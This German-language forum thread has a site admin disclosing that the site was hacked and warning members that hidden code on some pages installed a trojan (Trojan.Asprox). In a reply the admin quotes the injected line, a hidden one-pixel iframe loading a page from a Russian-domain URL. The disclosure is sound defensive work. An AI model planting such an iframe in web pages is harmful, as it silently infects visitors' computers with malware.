Achtung: Forum gehackt, bitte Eure PCs scannen

Wie lade ich ein Bild unter meine Posts, das Forum läuft nicht, usw.
Antworten
Benutzeravatar
sugi_tom
Site Admin
Beiträge: 2819
Registriert: 14.06.2005, 21:38
Wohnort: Bern

Achtung: Forum gehackt, bitte Eure PCs scannen

Beitrag von sugi_tom »

Scheinbar ist meine Website vor 3-4 Wochen gehackt worden. Auf jeden Fall hatte es auf einigen Seiten versteckten HTML-Code eingefügt, der einen Trojaner im Hintergrund herunterlädt und installiert. Ich möchte Euch daher bitten, auf Euren PCs einen Vollscan mit Eurer Antivirensoftware durchzuführen. Mein Symantec AntiVirus hatte den Trojaner z.B. von selber entdeckt.

Der Code wurde auf allen Seiten entfernt und Google sollte in Kürze keine Fehlermeldung mehr anzeigen. Wahrscheinlich wurde ich über das Gästebuch von Jax gehackt, eventuell aber auch über die Forumssoftware. Das Gästebuch ist jetzt entfernt und das Forum werde ich heute oder morgen aktualisieren, es könnte dann mal offline sein...

Vielen Dank fürs Verständnis und Daumendrück beim Scannen!

cbwbiker
Beiträge: 178
Registriert: 21.04.2008, 16:46
Wohnort: Olten
Kontaktdaten:

Beitrag von cbwbiker »

Hat der Trojaner eine bestimmte Bezeichnung?

Gruss

Benutzeravatar
sugi_tom
Site Admin
Beiträge: 2819
Registriert: 14.06.2005, 21:38
Wohnort: Bern

Beitrag von sugi_tom »

Yepp, ist der Trojan.Asprox. Folgende Zeile hat man mir in die Seiten geschmuggelt: <iframe width=1 height=1 border=0 frameborder=0 src="http://wfrules.ru/rotate/index.php"></iframe>
Er wird also von einer Seite in Rumänien heruntergeladen...

Benutzeravatar
Fippu #69
Beiträge: 3506
Registriert: 15.06.2005, 20:13
Wohnort: Bolligen
Kontaktdaten:

Beitrag von Fippu #69 »

Mein Antivira hat nichts gefunden
Wer bremst verliert!! :-)

Antworten